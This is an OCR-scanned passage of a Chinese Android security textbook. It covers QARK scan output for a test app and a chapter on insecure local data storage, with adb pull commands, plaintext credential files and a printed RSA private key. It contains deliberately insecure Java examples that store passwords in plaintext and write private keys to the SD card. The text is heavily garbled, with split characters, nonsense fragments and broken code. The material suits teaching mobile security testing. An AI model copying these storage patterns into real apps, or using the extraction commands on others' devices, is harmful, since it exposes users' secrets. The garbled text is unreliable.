the manifest, it will be set appropriately automatically by the tools. More info: 
http://developer.android.com/guide/topics/manifest/application-element.htmi#debug 








woming 


Backups enabled: Potential for data theft via local attacks via adb backup, if the device has USB debugging enabled (not common). 
More info: http://developer.android.com/reference/android/R.attr.html#allowBackup 























可 以 看 到 ，QARK 识 别 出 了 两 个 漏洞 。 除 了 漏洞 信息 外 ，QARK 还 提供 了 参考 链接 ， 帮 助 用 
户 理解 漏洞 信息 及 其 风险 。 


下 一 个 选项 卡 展示 了 包含 漏洞 的 相关 应 用 组 件 。 
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The following activity are exported, but not protected by any permissions. Failing to protect activity could leave them vulnerable to 
altack by malicious apps. The activity should be reviewed for vulnerabilities, such as injection and information leakage. 


se com.isi.testapp MainActivity 


* com.isi.testapp. Welcome 





























在 上 图 中 我 们 看 到 ，QARK 识 别 出 了 两 个 导出 的 activity， 我 们 需要 手动 检查 来 确定 它们 是 否 
真 的 会 给 应 用 带 来 风险 。 为 此 ， 可 以 创建 一 个 恶意 应 用 或 者 使 用 adb 命 令 来 进行 验证 。QARK 在 
报告 中 提供 了 这 些 abdq 命 令 ， 如 下 图 所 示 。 














adb shell am start -n “com. isi.testapp/com. isi. testapp.Welcome" 


adb shell am start -a “android.intent.action.MAIN" -n "com. isi.testapp/com.isi.testapp.MainActivity” 

















我 们 可 以 将 目标 应 用 安装 在 设备 或 者 模拟 器 上 ， 然 后 在 计算 机 上 运行 这 些 命令 。 


4.8.2 ”以 无 颖 模式 运行 QARK 
可 以 使 用 下 面 的 命令 让 QARK 以 无 缝 模式 运行 。 
$ python qark.py --source 1 --pathtoapk ../testapp.apk --exploit 1 --install 1 
程序 将 会 执行 和 前 面相 同 的 流程 来 查找 漏洞 ， 不 过 这 种 模式 不 需要 用 户 干预 。 
如 果 在 构建 POC 应 用 时 遇 到 错误 ， 可 以 将 -exploit 的 值 设 为 0。 
如 果 不 想 将 它 安装 到 设备 上 ， 可 以 将 -install 的 值 设 为 0。 
如 下 所 示 : 





python qark.py --source 1 --pathtoapk ../testapp.apk --exploit 0 --install 0 


这 样 ，QARK 会 对 应 用 进行 测试 并 提供 报告 ， 但 不 会 提供 POC 应 用 ， 如 下 所 示 。 





INFO - Initializing... 
INFO - Identified Android SDK installation from a previous run. 
INFO - Initializing QARK 


INFO - Unpacking /Users/srini0x00/Downloads/testapp.apk 

INFO - Zipfile: <zipfile.ZipFile object at 0x104ba0810> 

INFO - Extracted APK to /Users/srini0x00/Downloads/testapp/ 

INFO - Finding AndroidManifest.xml in /Users/srini0x00/Downloads/testapp 
INFO - AndroidManifest.xml found 

INFO - <?xml version="1.0" ?><manifest android: versionCode="1" 
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android:versionName="1.0" package="com.isi.testapp" 
xmlns:android="http://schemas.android.com/apk/res/android"> 

<uses-sdk android:minSdkVersion="8" android:targetSdkVersion="18"> 

</uses-sdk> 

<application android:allowBackup="true" android:debuggable="true" 

android: icon="@7F020000" android: label="@7F050000" android: theme="@7F060001"> 
<activity android: label="@7F050000" android:name="com.isi.testapp.MainActivity"> 
<intent-filter> 

<action android:name="android.intent.action.MAIN"> 

</action> 

<category android:name="android.intent.category.LAUNCHER"> 

</category> 

</intent-filter> 

</activity> 

<activity android:exported="true" android:name="com.isi.testapp.Welcome"> 
</activity> 

</application> 

</manifest> 

INFO - Determined minimum SDK version to be:8 

WARNING - Logs are world readable on pre-4.1 devices. A malicious app could potentially 
retrieve sensitive data from the logs. 

ISSUES - APP COMPONENT ATTACK SURFACE 

WARNING - Backups enabled: Potential for data theft via local attacks via adb backup, 
if the device has USB debugging enabled (not common). More info: http://developer. 
android.com/reference/android/R.attr.html#allowBackup 

POTENTIAL VULNERABILITY - The android:debuggable flag is manually set to true in the 
AndroidManifest.xml. This will cause your application to be debuggable in production 
builds and can result in data leakage and other security issues. It is not necessary 
to set the android:debuggable flag in the manifest, it will be set appropriately 
automatically by the tools. More info: http://developer.android.com/guide/topics/ 
manifest/application-element .html#debug 


==>EXPORTED ACTIVITIES: 

1icom.isi.testapp.MainActivity 

adb shell am start -a "android.intent.action.MAIN" -n "com.isi.testapp/com.isi. 
testapp.MainActivity" 

2com.isi.testapp.Welcome 

adb shell am start -n "com.isi.testapp/com.isi.testapp.Welcome" 


To view any sticky broadcasts on the device: 
adb shell dumpsys activity| grep sticky 


INFO - Support for other component types and dynamically adding extras is in the works, 
please check for updates 

An html report of the findings is located in: /Users/srini0x00/Downloads/qark-master/ 
report/report.html 

Goodbye! 
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毫 无 疑问 , QARK 不 仅 是 安 卓 SCA 最 好 的 工具 之 一 ， 而 且 还 是 免费 的 。 但 是 它 还 是 缺少 几 项 
功能 ， 如 提供 查询 内 容 提 供 程序 的 aap 命 令 、 利 用 注 和 漏洞、 识别 不 安全 数据 存储 漏洞 等 。 据 其 


GitHub 页 面 的 介绍 ， E 














其 中 的 几 项 功能 计划 在 未 来 的 版 本 中 实现 。QARK 的 GitHub 页 面 链接 是 : 
https://github.com/linkedin/gark o 


49 小 结 

本 章 通 过 介绍 OWASP 移 动 应 用 十 大 风险 中 提 到 的 常见 漏洞 ， 概 述 了 针对 安 卓 应 用 的 攻击 。 
此 外 ， 还 介绍 了 Drozer 和 QARK 等 自动 化 工具 。 本 章 只 介绍 了 这 些 工具 的 基础 知识 ， 后 面 还 将 详 
细 介 绍 它 们 。 


下 一 章 将 介绍 安 卓 应 用 中 不 安全 的 数据 存储 漏洞 。 














数据 存储 与 数据 安全 








本 章 将 介绍 评估 安 卓 应 用 数据 存储 安全 的 常用 技术 。 首先, 我 们 会 讨论 开发 人 员 进 行 本 地 数 
据 存储 时 使 用 的 不 同 技 术 , 以 及 这 些 技术 对 安全 性 的 影响 。 然 后 , 我 们 将 讨论 开发 人 员 选 择 的 数 
据 存储 技术 对 安全 性 的 影响 。 


下 面 是 本 章 将 要 讨论 的 部 分 主要 内 容 。 
口 什么 是 数据 存储 


口 SQLite 数 据 库 

口 内 部 存储 

口 外 部 存储 

口 CouchDB 数 据 存 储 

口 备份 技术 

O 在 已 ROOT 的 设备 上 检查 安 卓 应 用 





























5.1 什么 是 数据 存储 


安 卓 使 用 了 类 似 Unix 中 的 文件 系统 来 进行 本 地 数据 存储 ， 用 到 的 文件 系统 有 十 几 种 ， 如 
FAT32 、EXT 等 。 


事实 上 ， 安 卓 系 统 中 的 一 切 都 是 文件 。 因 此 ， 我 们 可 以 使 用 下 面 的 命令 从 /proc/filesystems 文 
件 中 查看 文件 系统 详情 。 


C:\> adb shell cat /proc/filesystems 
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响 ， 


root@t03g:/ # cat /proc/filesystems 
sysfs 

rootfs 

bdeu 


典型 的 文件 系统 根 目 录 如 下 





proc 
cgroup 
tmpfs 
binfmt_misc 
debugfs 


sockfs 
usbfs 
pipefs 
anon_inodefs 
deupts 
ext2 

ext3 

ext4 
ramfs 
vfat 
msdos 
ecryptfs 
fuse 
fuseblk 
fusectl 
selinuxfs 





图 所 示 。 








Q 
acct cache config d 
Q 
factory mnt preload proc 
Q 
system tmp-mksh tombstones usbdisk0 


QQ QQ 
data dev efs etc extSdCard 
Q 
root sbin sdcard storage sys 
0 = 

vendor defaultprop file_contexts fstab.smdk. init 








GFE filesystemsiX SCE PAAR T F 
的 应 用 等 。 任 何 拥有 物理 访问 权限 的 人 都 能 轻易 从 中 获得 许 
BARA., Ù 


刘 览 历史 或 者 公司 数据 等 。 


应 用 开发 人 员 应 
甚至 导致 严重 的 攻击 。 


我 们 来 简单 地 研究 一 下 文件 系统 














O /data: 存储 应 ` 
存 、 第 三 方 库 等 。 


drwxrwx- -x 
drwxrwx--x 
drwxrwx--x 
drwxrwx--x 
drwxrwx--x 
lrwxrwxrwx 
drwxrwx- -x 


u0_a93 
u0_a93 
u0_a93 
u0_a93 
uQ_a93 
install 


uO_a93 
u6_a93 
uO_a93 
u0_a93 
u0_a93 
install 
u0_a93 


u0_a93 


rg 


该 确保 数据 存储 安全 , 如 果 没 有 做 到 这 一 














多 详细 信息 ， 比 如 内 置 应 有 
多 敏感 信息 ， 








点 


ay 9 




















将 会 对 月 














用 数据 。/data/data 目 > 用 于 存 
通常 ， 应 用 在 安 


root@t03g: /data/data/com.whatsapplock # ls 
2016- 
2016- 
2016- 
2016- 
2016- 
2016- 
2016- 


ERASER, H 

















装 完成 后 会 存储 如 下 信息 。 


-1 

01-14 18 
01-14 
01-14 
01-14 18 
01-14 18 
01-24 
01-24 


app_data 
app_webview 
cache 
databases 
files 

lib 
shared_prefs 


月 、 通 过 谷歌 Play 商店 安装 
召 


如 照片 、 密 码 、GPS 位 


有 户 及 数据 产生 不 利 影 


F 理 解 它 们 的 重要 性 。 
湛 与 应 用 相关 的 私人 数据 ， 如 共享 


首选 项 、 绥 


-> /data/app-lib/com.whatsapplock-1 
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| 只 有 特定 的 用 户 才能 访问 这 个 目录 , 其 他 的 应 用 则 不 能 。 在 本 例 中 ,这 个 特 | 
> 定 的 





用 户 是 u0 a93。 


O /proc: 存储 与 进程 、 文 件 系统 、 设 备 等 相关 的 数据 。 
O /sdcard: SD 卡 用 于 增加 存储 容量 。 在 三 星 设备 上 , /sdcard 通 常 对 应 内 置 SD 卡 , 而 /extsdcard 
则 对 应 外 置 SD 卡 。SD 卡 可 以 存储 视频 等 大 文件 。 














安 卓 本 地 数据 存储 技术 
安 卓 为 开发 人 员 提供 了 下 列 几 种 存储 应 用 数据 的 方法 。 


口 共享 首选 项 
O SQLite 数 据 库 
口 内 部 存储 

口 外 部 存储 


除了 外 部 存储 方式 ,其 他 存储 方式 都 将 数据 存放 在 /data/data 目 录 下 的 文件 夹 中 ,其 中 包含 组 5 
存 、 数 据 库 、 文件 以 及 共享 首选 项 这 四 个 文件 夹 。 每 个 文件 夹 分 别 用 于 存放 与 应 用 相关 的 特定 类 
型 的 数据 : 


口 shared_prefs: 使 用 XML 格 式 存 放 应 用 的 偏好 设置 ; 
O lib: 存放 应 用 需要 的 或 导入 的 库 文件 ; 

口 databases: 包含 SQLite 数 据 库 文件 ; 

O files: 用 于 存放 与 应 用 相关 的 文件 ; 

O cache: 用 于 存放 缓存 文件 。 


1. 共享 首选 项 


共享 首选 项 是 一 些 XML 文 件 ， 它 们 以 刍 值 对 的 形式 存储 应 用 的 非 敏感 设置 信息 。 所 存储 的 
数据 类 型 通常 是 boolean 、float 、int、long 和 string 等 。 


























2. SQLite 数 据 库 


SQLite 数 据 库 是 基于 文件 的 轻 量 级 数据 库 , 通常 用 于 移动 环境 。 安 卓 系 统 同样 支持 SQLite 框 
R, 因此 你 经 常会 发 现 许 多 使 用 SQLite 数 据 库存 储 数据 的 应 用 。 由 于 安 卓 系统 在 安全 性 方面 的 限 
制 ， 应 用 存储 在 SQLite 数 据 库 中 的 数据 默认 不 能 被 其 他 应 用 访问 。 


3. 内 部 存储 
内 部 存储 也 被 称 为 设备 的 内 部 存储 ， 可 以 将 文件 存储 到 内 部 存储 空间 。 由 于 能 被 直接 访问 ， 
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因此 它 能 快速 响应 内 存 访问 请 求 ， 与 应 用 相关 的 全 部 数据 几乎 都 在 这 里 被 使 用 。 从 逻辑 上 来 说 ， 
它 是 手机 的 硬盘 。 在 安装 过 程 中 , 每 个 应 用 都 在 /data/data/< 应 用 包 名 >/ 下 创建 了 各 自 的 文件 目录 ， 
这 些 目录 对 每 个 应 用 都 是 和 有 的 ， 其 他 应 用 没有 访问 权限 。 当 用 户 伸 载 应 用 后 , 这些 目录 中 的 文 
件 将 会 被 删除 。 

4. 外 部 存储 

外 部 存储 是 安 卓 系统 中 一 种 用 于 存储 文件 的 全 局 可 读 写 的 存储 机 制 。 任 何 应 用 都 能 访问 外 部 
存储 区 域 并 读 写 文件 ， 由 于 这 一 特性 ， 敏 感 文 件 不 应 该 存储 在 这 里 。 开 发 人 员 需 要 在 
AndroidManifest.xml 中 声明 合适 的 权限 才能 进行 这 些 操作 。 

我 们 使 用 下 面 的 命令 来 安装 示例 应 用 。 


adb install < 应 用 名 称 > .apk 



































rGoats\ Android\ App.apk 


oatDroid- FourGoats Android App.apk 











安装 完成 后 ， 这 个 应 用 在 /data/data/org.owasp.goatdroid.fourgoats 下 创建 了 下 面 这 些 文件 ， 主 
界面 如 下 图 所 示 。 你 可 以 使 用 用 户 名 joegoat 和 密码 goatdroid 登 录 应 用 。 








Fal (2% 4:32 


Username 


joegoat 


Password 


~ Remember Me 


Login 


Register 





如 上 文 所 述 ， 通 过 分 析 这 些 目 录 可 以 得 到 一 些 有 趣 的 信息 。 


g:/data/data/org.owasp.goatdroid.fourgoats # Is 
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启动 FourGoats 应 用 ， 并 注册 一 个 新 用 户 。 注 册 成 功 后 ， 使 用 注册 信息 登录 应 用 ， 我 的 用 户 
名 和 密码 均 为 test， 如 下 图 所 示 。 





a] = & 
Q Login 


Username 
test 


Password 


™ Remember Me 


Login 


Register 











可 以 使 用 sharedPreferences 类 来 创建 共享 首选 项 。 下 面 这 段 代 码 用 于 在 credentials.ml 文 
件 中 存储 用 户 名 和 密码 。 


public void saveCredentials(String paramStringl, String 

paramString2) 

{ 
SharedPreferences.EditorlocalEditor = 
getSharedPreferences("credentials", 1).edit(); 
localEditor.putString("username", paramString1); 
localEditor.putString("password", paramString2) ; 
localEditor.putBoolean("remember", true); 
localEditor.commit (); 


} 
如 前 文 所 述 ， 应 用 目录 下 存放 了 共享 首选 项 。 
/data/data/<&%>/shared_prefs/<filename.xml> 


我 们 来 浏览 并 查看 应 用 是 否 在 上 面 的 路 径 中 创建 了 共享 首选 项 文件 。 






































如 上 图 所 示 ， 有 一 个 名 为 shared_prefs 的 文件 夹 ， 里 面包 含 了 三 个 XML 文 件 。credentials.xml 这 
个 名 字 看 起 来 与 首选 项 有 关 。 我 们 使 用 cat credentials.xml 命 令 来 查看 这 个 文件 中 的 内 容 。 
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standalone="yes 























如 果 你 不 习惯 使 用 shell, 可 以 使 用 下 面 的 命令 将 文件 拉 取 到 你 的 操作 系统 , 并 使 用 自己 常用 
的 文本 编辑 需 打 开 它 。 


$adb pull /data/data/org.owasp.goatdroid.fourgoats/shared_pres/ 
credentials.xml 

















真实 应 用 举例 


OWASP 的 FourGoats 应 用 是 一 个 演示 应 用 ， 你 可 能 认为 人 们 不 会 将 敏感 信息 存储 到 共享 首选 
项 中 。 我 们 来 看 一 个 与 这 一 漏洞 有 关 的 真实 例子 
WhatsApp, 、Viber 和 Facebook 等 流行 应 用 的 工具 。 


它 的 主 界面 如 下 图 所 示 。 


























o WhatsApp Lock 是 一 款 使 用 PIN 码 锁定 诸如 


ChatLock+ 


Enter your 


Recover 
PIN 0 


PIN 
€l 


alle = snornow | SK- 
3 NEW YEAR. NEW DESTINY = SKII 








我 们 使 用 Droid Explorer 来 浏览 该 应 用 的 /data/data 目 录 。 











下 面 是 使 有 








HDroid Explorer 拉 取 共 享 首 选项 文 从 


(1) 将 安 卓 设备 连接 到 计算 机 上 。 


(2) 启动 Droid Explorer， 浏 览 whatsapplock 目 录 。 


F 的 步骤 。 
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@ Droid Explorer: 4dflfode0f6a8f5d @ Ask for Heip = 
66- [O >» 4dflf0de0f6a8f5d » data » data » com.whatsapplock » shared_prefs > ~|4] 
L E ame © 辣 
Edit Tools Help B Connect to Device Donate 
eMaachmeOBise sm BOADA 
no_backup a © © © © © © e 
shared_prefs 
4 Gl comwhatsapplock comwhatsap IMAdTrack.. imprefxml inmobiApp... inmobiApp.. MillennialM... WhatsLock 
app_data plock_prefer 
app_webview ences.xml 
cache = 
databases 3 
files 
> f lib 
shared_prefs X 
4 咱 | 上 
7objects 5.56KB :| 
-一 一 一 一 一 | 
k De aw > vH =a aan rt sn 4 na 
(3) 选择 Help 菜 单 上 方 的 Copy to Local Computer 选 项 。 复 制 完 成 后 ， 使 用 任意 文本 编辑 器 打 


开 XML 文 件 。 





EH comwhatsapplock_preferencesxml 四 
1 <?xml version='1.0' encoding='utf-8' standalone='yes' ?> 
2 日 <map> 
<boolean name="reviewed" value="true" /> 
4 <string name="entryCode">1234</string> 
5 <int name="revstatus" value="37" /> 
6 <string name="recoverQuestion">What is your mother's maiden name?</string> 





<string name="recoverCode">maria</string> 
</map> 





正如 你 所 看 到 的 ， 密 码 以 明文 存储 。 如 果 你 提供 了 密 保 问题 ， 就 能 看 到 密码 。 


该 应 用 具有 PIN 码 恢 复 功 能 ， 以 便 在 忘记 PIN 码 的 情况 下 找 回 。 但 是 你 需要 回答 密 保 问题 。 
密 保 问题 及 其 答案 同样 以 明文 的 方式 直接 存储 在 shared_prefs XML 文 件 中 。 
































ChatLock+ 


Your PIN is 1234 


EE 








如 上 图 所 示 ， 如 果 你 回答 了 密 保 问题 ， 就 能 获取 应 用 当前 的 PIN 码 。 
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5.3 SQLite 数据 库 


SQLite 数 据 库 是 基于 文件 的 轻 量 级 数据 库 ， 扩 展 名 通常 为 .db 或 .sqlite。 安 卓 系 统 完全 支持 
SQLite 数 据 库 。 应 用 中 的 其 他 类 都 能 访问 应 用 创建 的 数据 库 ， 但 其 他 应 用 则 不 能 访问 。 


下 面 的 这 段 代码 展示 了 一 个 示例 应 用 在 SQLite 数 据 库 文 件 userdb 中 存储 用 户 名 和 密码 。 




















String uName=editTextUName.getText().toString(); 
String passwd=editTextPasswd.getText().toString(); 


context=LoginActivity.this; 
dbhelper = DBHelper(context, "user.db",null, 1); 
dbhelper.insertEntry(uName, password); 


我 们 通过 编程 的 方式 扩展 soLiteopenHelper 类 , 从 而 实现 数据 库 的 插入 和 读 取 , 并 将 来 自 
用 户 的 数值 插入 一 个 名 为 USER 的 表 中 。 























import android.database.sqlite.SQLiteDatabase; 
import android.database.sqlite.SQLiteDatabase.CursorFactory; 


import android.database.sqlite.SQLiteOpenHelper; 





public class DBHelper extends SQLiteOpenHelper 
{ 
String DATABASE _CREATE = "create table" + " USER " + "(" + "ID 
" + "integer primary key autoincrement," + 
"uname text,passwd text); "; 
public SQLiteDatabasedb; 


public SQLiteDatabasegetDatabaseInstance() { 
returndb; 


} 


public DBHelper (Context context, String name, CursorFactory 
factory, int version) { 
super(context, name, factory, version); 


} 


public void onCreate(SQLiteDatabasedb) { 
db.execSQL (DATABASE_CREATE) ; 


} 


public insertEntry(String uName, String Passwd) { 
ContentValues userValues = new ContentValues(); 
userValues.put ("uname", uName) ; 
userValues.put ("passwd", passwd); 
db.insert ("USER", null, userValues); 
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有 了 这 些 信 息 , 我 们 再 来 看 一 下 它 是 如 何 存储 到 文件 系统 中 的 。 安 卓 应 用 存放 数据 库 文件 的 
位 置 如 下 。 


/data/data/< 包 名 >/databases/< 数 据 库 名 .db> 
进入 该 应 用 的 相应 路 径 ， 查 看 应 用 是 否 创建 了 数据 库 文件 。 检 查 步骤 同 5.2 节 ， 可 以 使 用 adb 
拉 取 文件 ， 或 是 使 用 Droid Explorer 将 文件 复制 到 桌面 上 。 


pulle h 


在 本 例 中 ， 我 进入 到 /data/data/com.example.sqlitedemo 目 录 ， 在 databases/ 文 件 夹 中 找到 了 
user.db 文 件 。 从 前 面 的 图 中 可 以 看 出 ， 我 们 将 其 拉 取 到 计算 机 中 ， 然 后 执行 下 面 的 步骤 。 

















(1) 使 用 Droid Explorer 拉 取 user.db 文 件 ; 

















































































































(2) 打开 SQLite 浏 览 器 ， 将 userdb 拖 放 到 浏览 器 窗口 ; 
(3) 双击 即 可 浏览 数据 。 
$ DB Browser for SQLite - cM HP Downloads/Android/user.db E| x 
New Database Open Database ] Write Changes È Revert Changes 
Database Structure | Browse Data | Edit Pragmas | Execute SQL | pe seama ons 
Table: | |] USER ~) (Æ) 国 [New Record | {Delete Record | eins Type Schema 
1 4 E Tables (2) 
ID uname passwd | 
Filter Filter Filter | 
> J) USER CREATE T; 
1/2 test test 
23 sqliteuser sqlitepass > E sqlite_sequence CREATE TA 
Indices (0) 
加 Views (0) 
LJ} Triggers (0) 
[Salto | Pot | oB schema | 
UTF-8 
正如 你 所 见 ， 安 卓 应 用 在 user.db 中 存放 了 用 户 名 和 密码 。 





54 内 部 存储 
内 部 存储 是 安 点 应 用 存储 数据 的 另 一 种 方式 ， 通 常 存放 在 /data/data/< 应 用 包 名 > 中 的 文件 


夹 里 。 
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下 面 的 代码 展示 了 如 何 使 用 内 部 存储 保存 应 用 私 钥 , 这 个 私 钥 用 于 存放 和 发 送 用 户 的 信用 卡 
号 和 社保 号 码 。 


String publickeyFilename = "public.key"; 

String privateKeyFilename = "private.key"; 
try { 

GenerateRSAKeysgenerateRSAKeys = new 

GenerateRSAKeys () ; 


Security.addProvider (new 
org.bouncycastle.jce.provider.BouncyCastleProvider()); 


// Generate public & private keys 
KeyPairGenerator generator = 
KeyPairGenerator.getInstance("RSA", "BC"); 


//create base64 handler 
BASE64Encoder b64 = new BASE64Encoder () ; 


//Create random number 
SecureRandom rand = secureRandom() ; 
generator.initialize(2048, rand); 


//generate key pair 

KeyPairkeyPair = generator.generateKeyPair(); 
Key publickKey = keyPair.getPublic(); 

Key privateKey = keyPair.getPrivate(); 





FileOutputStreamfos = null; 

try { 
fos = openFileOutput (publicKeyFilename, 
Context .MODE_PRIVATE) ; 
fos.write(b64.encode (publickKey.getEncoded())); 
fos.close(); 


fos = openFileOutput (privateKeyFilename, 
Context .MODE_PRIVATE) ; 

fos.write(b64.encode (privateKey.getEncoded())); 
fos.close(); 


小 

catch (FileNotFoundException e) { 
e.printStackTrace(); 

} 

catch (IOException e) { 
e.printStackTrace(); 


} 
catch (Exception e) { 
System.out.printin(e); 


} 


从 上 面 的 代码 中 可 以 看 到 ， 私 钥 存放 在 files 目 录 下 的 private.key 文 件 中 ， 这 种 方式 是 不 安 
全 的 。 
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打开 Droid Explorer ( 或 者 使 用 aab pull ft ) 将 私 钥 从 设备 复制 到 计算 机 上 ， 然 后 使 用 文 
本 编辑 器 打开 它 。 








private key & 





2 MIIEowIBAAKCAQEAnkKGzYCesPn20TO2V5 6XLQKBqkST 3WurKrPC724CJwqdzWvN 
3 id3PS89utqGGaBMVgtuG6XC1/gkMt 7+HgS3FLO3wt 7wE8 6Wx600K4vkByfmNzeG1 
4 wndYsPYDToMiww41dCMH9w9y6y8CwXJLF1lmvA0Q3m817AcIDvA2/u9Yy4ec5FLGG 
5 e8CChfhZaQqGbuN6YVW03xdj 0mNzb1xj gCZqtEj LAduBxxfU6D1iBROegS82Gxtw 
6 FMX7AYNdUO/y4dvQL9DR1R94qoZhCuMz99vEdHzhCb/ 1NKQXfbGJS19vy0O/SxQpt 
7 qytRt0btcdeCxx4EUVUBpku9/Tj LczG3hyHyMwI DAQABAOIBAAnsJ+GI1+qGsZfq 
8 Qxt5QQc8af7P7+1pD8FMpgM3BYGHI9+2S5uuMUoShmGC/RdXYvj zcnD+dBnaXWbD 
9 5m4N/Z£UjOwlyLWyBNaSziTu8dLFB8QJysfHjdMCibCJfkt2fpiqfZxa5pyiRoz2 
10 CokrNFLjGw10c3bnwC4x0n0/b8 9EA8t /fab136IMYaFWD81dfgL7qmrrSozEp3T1 
11 W1EAkruVqigoYNt2cewAU6TnilCvqG2j 4bd1rsokRVwOFN3GSklv8XYmMoU1fzij 
12 3tgfdZH+9KHhZMZsjKFmT9ZF8NXAeKBOCiKgmr+EmJBqcXKo5Szmqj P5W/RF6iTK 
13 bfLn4xkCgYEAzpxdzzCBAN/RErgQmiuvm7+7pGvq6nF 3wW0dhGxD3tWZ0Sz+Qulo 
14 KelP1o0AVLag3GwZ5QLzZH5fY8HbEQ) klJURtoirFZ2EfL+f£ful 7wQ0xCkD8£KS5D3P02 
15 oKxQUKSY++4TL3EyK2VxtKg/4SsQrOZrdEhR70PMLwt v4 j pvswPxuFUCgGYEAxBdN 
16 +Y8v5dYAKSuATR2t5XRz6QnWt 410P3WEQk2VbsPPDGQgSCcN5kOegWmBwqLUhijc 
17 ygTbPV1TnY5W1Q0JH/+gYkvIMvsQvBV1oKWd+Xj PqeWbdEKRqInMTdJunX3z0uxB 
18 xX/O1WNNEhHhsdJi 4Womt i0GaIbh3kZdyh1FqGcCgYEAiRirCtN11n3t folSvupk 
19 EWYtfdHéRGzceSYNYxRwCMoVbSIU6ZN1gfSteHjvFKe9QRqP1MxvnIFCrLUUdkXxc 
20 8L3IKjEJEan7A3jdC6HU06i ZoaYE8 /m4C++rL44xD6KPanijQLaEt8q48JGh9AjF 
21 nphqfFU/5KujJyt 9ePOSBSOCgYASnReOwcf£NLGQ1v3wNVezk5AoArANqxw2q3G/i 
22 j1TI/+NOjM6XqsVh/zcz1510qYA8 //H9ZzqcdS5hxU0qaulwysmQ6EHF/jV+ISwur 
23 1S0Kul IUEYyRG6SR+Aqht ID1iDgndr£D1J86hQOS3ImtBIilVzg3£+XJVExqegl7 
Hw42rwKBgCAHE+mgt Sy9t 8r9bol1j ub0Z5PkSCSVE63j Zxg0FcOIZZqCeD4P6eORI 
T6XZ113tQtCtX2uUWF1Id08be 9CSEOvskYW700cFWaz82aiAzUvauBcOUgdhoGkE 
JHh30BVNdqQ6Hj z1Z4EL3kYf9qZIVEO9IddMM8wvg0qGBThUrNXxg 
-----END RSA PRIVATE KEY----— 


NNNN 
of 


a 

















5.5 外 部 存储 


外 部 存储 是 安 卓 系统 中 男 一 个 重要 的 存储 机 制 。 一 些 知 名 的 应 用 都 将 数据 存储 在 外 部 存储 
( 即 SD 卡 ) 中 。 将 数据 存储 到 SD 卡 时 需要 特别 注意 ,因为 它 是 全 局 可 读 写 的 。 用户 甚至 可 以 轻松 
将 SD 卡 从 设备 上 移 除 ， 然 后 挂 载 到 男 一 台 设备 中 ， 以 便 访问 和 读 取 其 中 的 数据 。 


我 们 继续 使 用 前 面 的 例子 ， 这 一 次 将 应 用 数据 存储 在 外 部 存储 ， 也 就 是 SD 卡 中 。 


String publicKeyFilename = public.key; 
String privateKeyFilename = private.key; 








try { 
GenerateRSAKeysgenerateRSAKeys = new 
GenerateRSAKeys(); 
Security.addProvider (new 
org. bouncycastle.jce.provider.BouncyCastleProvider()); 


// Generate public & private keys 
KeyPairGenerator generator = 


KeyPairGenerator.getInstance("RSA", "BC"); 


//create base64 handler 
BASE64Encoder b64 = new BASE64Encoder () ; 


//Create random number 





114 ASR 数据 存储 与 数据 安全 
SecureRandom rand = secureRandom() ; 
generator.initialize(2048, rand); 
//generate key pair 
KeyPairkeyPair = generator.generateKeyPair(); 
Key publickey = keyPair.getPublic(); 
Key privateKey = keyPair.getPrivate(); 
FileOutputStreamfos = null; 
try { 
//save public key 
file = new 
File (Environment .getExternalStorageDirectory(). 
getAbsolutePath() + "/vulnApp/", 
publickeyFilename) ; 
fos = new FileOutputStream(file); 
fos.write(b64.encode(publickKey.getEncoded())); 
fos.close(); 
//save private key 
file = new 
File (Environment .getExternalStorageDirectory(). 
getAbsolutePath() + "/vulnApp/", 
privateKeyFilename) ; 
fos = new FileOutputStream(file); 
fos.write(b64.encode(privateKey.getEncoded())); 
fos.close(); 
} 
catch (FileNotFoundException e) { 
e.printStackTrace(); 
} 
catch (IOException e) { 
e.printStackTrace(); 
} 
} 
catch (Exception e) { 


} 


System.out.printlin(e); 


正如 我 们 看 到 的 ， 应 用 使 用 Environment .getExternalStorageDirectory () 方 法 将 私 
钥 存放 在 SD 卡 的 vulnapp 目 录 下 。 这 样 ， 任 何 恶 意 应 用 都 能 读 取 私 钥 ， 并 将 其 发 送 到 互联 网 中 的 


远程 服务 器 上。 














应 用 要 访问 外 部 存储 , 前 面 的 代码 需要 在 AndroidManifest.xml 文 件 中 声明 WRITE_EXTERNAL 
STORAGE 权 限 。 


<uses-permissionandroid:name="android.permission.WRITE_EXTERNAL_ 
STORAGE" /> 
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5.6 ”用户 字典 缓存 


用 户 字 典 是 大 多 数 移动 设备 所 具有 的 一 个 非常 方便 的 功能 , 能 够 让 键盘 记 住 用 户 经 常 输入 的 
词组 。 当 我 们 使 用 键盘 输入 特定 的 词组 时 ， 它 能 自动 提供 一 些 补 全 建议 。 安 卓 系统 同样 具有 这 一 
功能 ， 它 将 常用 词组 存放 在 一 个 名 为 user_dict.db 的 文件 中 。 因 此 , 应 用 开发 人 员 需 要 小 心 。 如 果 
允许 缓存 输入 安 卓 应 用 的 敏感 信息 , 那么 任何 人 都 可 以 通过 浏览 user dict.db 文 件 或 使 用 其 内 容 提 
供 程序 的 URI 访 问 这 些 数据 。 

由 于 任何 应 用 都 可 以 通过 用 户 字 典 的 内 容 提供 程序 访问 其 内 容 , 因此 攻击 者 可 以 轻易 读 取 和 
搜集 其 中 的 有 用 信息 。 

与 前 面 处 理 .db 文件 的 方式 一 样 , 我 们 将 user dict.db 数 据 库 文件 从 设备 中 拉 取 到 计算 机 上 ，, 并 
使 用 SQLite 浏 览 器 打开 它 。 

c:>adb pull /data/data/com.android.providers.userdictionary/databases/ 


user_dict.db 
477 KB/s (16384 bytes in 0.033s) 
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上 面 的 命令 将 数据 库 文件 从 设备 拉 取 出 来 ， 并 保存 到 当前 目录 。 
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上 图 显示 了 应 用 在 user_dict.db 文 件 中 存储 的 敏感 信息 。 


5.7 不 安全 的 数据 存储 一 一 NoSQL 数据 库 
目前 ，NoSQL 数 据 库 使 用 广泛 。 企业 普遍 使 用 了 诸如 MongoDB、CouchDB 等 NoSQL 数 据 库 。 
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这 些 数据 库 同 样 适用 于 移动 应 用 。 与 其 他 本 地 存储 技术 类 似 , 如 果 NoSQL 数 据 库 通 过 不 安全 的 方 
式 存储 数据 ， 就 可 能 会 被 利用 。 本 节 将 介绍 因 NoSQL 数 据 库 使 用 不 当 而 导致 的 数据 存储 漏洞 。 


我 们 通过 一 个 示例 应 用 来 介绍 这 一 漏洞 。 








NoSQL 示例 应 用 的 功能 
了 解 应 用 的 功能 对 于 理解 和 找 出 它 存在 的 风险 很 重要 。 


我 们 来 看 一 下 示例 应 用 ， 它 类 似 于 一 个 存储 密码 的 “保险 柜 ”。 用户 数据 存储 在 NoSQL 数 据 
